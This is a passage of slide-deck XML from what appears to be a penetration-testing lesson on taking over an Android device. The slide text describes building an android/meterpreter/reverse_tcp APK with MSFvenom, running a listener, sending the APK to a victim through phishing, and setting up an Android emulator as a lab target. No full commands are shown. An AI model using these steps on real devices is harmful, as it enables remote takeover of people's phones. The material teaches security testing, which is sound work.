                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>android/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> while creating an .apk file with MSFvenom</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1770" name="Google Shape;1770;p255"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3687225" y="2019000"/>
            <a:ext cx="4673601" cy="2961526"/>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25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776" name="Google Shape;1776;p256"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Then we can successfully run the exploit to listen for the reverse connection.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal: run</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1777" name="Google Shape;1777;p256"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734950" y="1357825"/>
            <a:ext cx="3467099" cy="3315775"/>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25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783" name="Google Shape;1783;p257"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Next, we need to install the malicious Android .apk file to the victim mobile device. In our environment, we are using an Android device version 8.1 (Oreo). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Attacker can share a malicious Android .apk to the victim with the help of social engineering/email phishing.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Now it is time to quickly set up the Android emulator (if you don’t have an Android device).</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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Google Shape;1788;p25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789" name="Google Shape;1789;p258"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Steps to configure the Android emulator:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Download the image file for the Android x86 code project from the Google Code projects site (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="551A8B"/>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https://code.google.com/archive/p/android-x86/downloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Create a virtual machine using another version 2.6x kernel in the VMware workstation</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Mount the ISO file into VMware options</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Finish the process and run the machine in LIVE mode</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Set up the Android device</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Set up the Google account</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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1794" name="Google Shape;1794;p25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795" name="Google Shape;1795;p259"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Note: Android x86 project can connect it to a local network with an Ethernet adapter (VMnet8). If you are using another emulator to penetrate the Android device, you can also use a CLI Android emulator.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>After setting up the Android emulator in VM, we are going to download the file from cloud link we have created on Kali Linux and emailed to the victim account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1796" name="Google Shape;1796;p259"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538825" y="2651150"/>
            <a:ext cx="5234525" cy="2308200"/>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1" name="Google Shape;1801;p26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802" name="Google Shape;1802;p260"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
